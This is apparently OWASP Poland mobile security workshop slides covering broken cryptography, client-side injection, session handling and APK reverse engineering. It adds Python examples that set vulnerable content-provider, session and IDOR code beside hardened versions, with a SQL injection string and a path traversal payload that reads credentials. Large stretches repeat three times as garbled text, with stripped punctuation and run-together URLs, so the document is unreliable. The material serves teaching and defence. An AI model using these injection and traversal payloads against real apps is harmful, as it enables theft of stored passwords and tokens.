  Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  // implicit intent: any camera app may answer
  Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
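What the two drozer scanner modules above are probing for, reproduced as an added example (not code from the workshop or from drozer) in a small model of a content provider, so the vulnerable and the hardened code sit side by side: `query_vulnerable()` concatenates the caller's projection and the URI's `service` segment into SQL, the way an exported provider that passes its arguments straight to SQLite does, and a single quote in the selection is the error drozer watches for; `query_hardened()` whitelists the columns and binds the value. `open_file_vulnerable()` and `open_file_hardened()` model `openFile(Uri)` serving files under the app's `files` directory, with and without canonicalising the path first. The table contents and the file layout are constructed in memory and in a temporary directory.

```python
import os
import sqlite3
import tempfile

ALLOWED_COLUMNS = ("_id", "service", "username")   # what the provider is meant to expose


def make_db():
    """Constructed sample data: the table behind a password-manager provider."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Credentials (_id INTEGER PRIMARY KEY, service TEXT, "
               "username TEXT, password TEXT)")
    db.executemany("INSERT INTO Credentials (service, username, password) VALUES (?, ?, ?)",
                   [("mail", "alice", "s3cret1"), ("bank", "bob", "hunter2"), ("vpn", "carol", "letmein")])
    return db


def _rows(cursor):
    cols = [d[0] for d in cursor.description]
    return [dict(zip(cols, row)) for row in cursor.fetchall()]


def query_vulnerable(db, projection, service):
    """Models ContentProvider.query() that interpolates the caller's projection and
    the URI's service segment into SQL.  A projection of ["password"] reads a
    column that was never meant to be exposed, and the service value
    ' OR 1=1 --  turns the WHERE clause into 'match everything'."""
    sql = "SELECT %s FROM Credentials WHERE service = '%s'" % (", ".join(projection), service)
    return _rows(db.execute(sql))


def query_hardened(db, projection, service):
    """Whitelisted projection, bind parameter for the value: the injection string
    is compared as a literal and matches nothing."""
    if not projection or any(col not in ALLOWED_COLUMNS for col in projection):
        raise ValueError("projection asks for a column this provider does not expose")
    sql = "SELECT %s FROM Credentials WHERE service = ? ORDER BY _id" % ", ".join(projection)
    return _rows(db.execute(sql, (service,)))


def make_sandbox():
    """Constructed file layout: the provider is meant to serve <app>/files only;
    shared_prefs next to it holds something sensitive.  Returns the files dir."""
    root = tempfile.mkdtemp(prefix="provider-")
    os.makedirs(os.path.join(root, "files"))
    os.makedirs(os.path.join(root, "shared_prefs"))
    with open(os.path.join(root, "files", "report.txt"), "wb") as f:
        f.write(b"quarterly report")
    with open(os.path.join(root, "shared_prefs", "creds.xml"), "wb") as f:
        f.write(b'<map><string name="token">abc</string></map>')
    return os.path.join(root, "files")


def open_file_vulnerable(base_dir, requested):
    """Models openFile(Uri) doing new File(baseDir, uri.getPath()):
    '../shared_prefs/creds.xml' walks straight out of the directory."""
    with open(os.path.join(base_dir, requested), "rb") as f:
        return f.read()


def open_file_hardened(base_dir, requested):
    """Canonicalise first, then check the result is still inside base_dir;
    scanning the string for '..' is not enough (encodings, symlinks)."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the provider directory: %r" % requested)
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, ["password"], "' OR 1=1 --"))   # every password
    print(query_hardened(db, ["username"], "' OR 1=1 --"))     # []
    base = make_sandbox()
    print(open_file_vulnerable(base, "../shared_prefs/creds.xml"))
    try:
        open_file_hardened(base, "../shared_prefs/creds.xml")
    except PermissionError as e:
        print("blocked:", e)
```

On a device the same two payloads are what `content query --uri content://<authority>/... --projection password --where "service = '' OR 1=1 --"` and a traversal URI through drozer would send; the hardened versions also need the provider to be non-exported or permission-protected in the manifest, which the `app.package.manifest` output above shows.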
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid relying on intent-filters for internal communication: even if the Activity has the attribute exported="false", another application can define the same filter, and when you send an implicit intent the system displays a chooser so the user can pick which app handles it
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling ndash how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  – http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling – mitigations
• Invalidate sessions on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
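The mitigations above, together with the Poor Authorization advice to enforce authorization on the server, as one added example (not code from the workshop): a minimal server-side session store whose tokens come from the OS CSPRNG, expire on idle and absolute timeouts, die on logout and are replaced whenever the authentication state changes, and an account handler that takes the acting user from the session rather than from a client-supplied user ID. `weak_token_from_device_id()` is the anti-pattern from "how to find" (device ID as session token), kept for contrast, and `get_account_vulnerable()` is the IDOR that editing a parameter in Burp exploits. Users, balances, timeouts and the request shape are constructed.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 30 * 60        # 30 minutes, the gap the "copy a cookie and retry" test probes
ABSOLUTE_TIMEOUT = 12 * 3600  # re-authenticate at least twice a day regardless of activity


def weak_token_from_device_id(device_id: str) -> str:
    """Anti-pattern: a token derived from the device ID is deterministic, so
    whoever learns or guesses the ID can mint the session themselves."""
    return hashlib.md5(device_id.encode("utf-8")).hexdigest()


class SessionStore:
    """Server-side store; the client only ever holds the opaque token."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so expiry can be tested without sleeping
        self._sessions = {}          # token -> {"user", "created", "last_seen"}

    def create(self, user: str) -> str:
        token = secrets.token_urlsafe(32)       # 256 bits from the OS CSPRNG
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def resolve(self, token):
        """User bound to a live token, else None.  Expired tokens are destroyed on
        sight, so a copied cookie stops working instead of lingering in the store."""
        s = self._sessions.get(token)
        if s is None:
            return None
        now = self._clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[token]
            return None
        s["last_seen"] = now
        return s["user"]

    def invalidate(self, token) -> None:
        """Logout: the server forgets the token, whatever the client keeps."""
        self._sessions.pop(token, None)

    def invalidate_all_for(self, user: str) -> None:
        """Password change / logout everywhere: every token of the user dies."""
        for t in [t for t, s in self._sessions.items() if s["user"] == user]:
            del self._sessions[t]

    def switch_user(self, old_token, user: str) -> str:
        """Authentication state changed: the old token is destroyed and a fresh one
        issued; a token is never re-bound to a new identity."""
        self.invalidate(old_token)
        return self.create(user)


ACCOUNTS = {"alice": {"balance": 120}, "bob": {"balance": 75}}   # constructed data


def get_account_vulnerable(request: dict) -> dict:
    """Trusts the client: change user_id in Burp and read someone else's account."""
    return ACCOUNTS[request["user_id"]]


def get_account(store: SessionStore, request: dict) -> dict:
    """Identity comes from the session; a user_id in the request may only name
    the caller's own resource."""
    user = store.resolve(request.get("token"))
    if user is None:
        raise PermissionError("no valid session")
    if request.get("user_id", user) != user:
        raise PermissionError("session user does not match the requested resource")
    return ACCOUNTS[user]


if __name__ == "__main__":
    store = SessionStore()
    token = store.create("alice")
    print(get_account(store, {"token": token}))                          # alice's own account
    print(get_account_vulnerable({"token": token, "user_id": "bob"}))    # the IDOR
    try:
        get_account(store, {"token": token, "user_id": "bob"})
    except PermissionError as e:
        print("blocked:", e)
    print(weak_token_from_device_id("0123456789abcdef") == weak_token_from_device_id("0123456789abcdef"))
```

The 30-minute idle value is a placeholder for "adjusted to your application": the study cited above puts a typical app session at just over a minute, so for most apps an idle timeout far shorter than a web session's is justified, while the absolute timeout bounds how long a stolen token stays useful even on a device that is in constant use.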
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
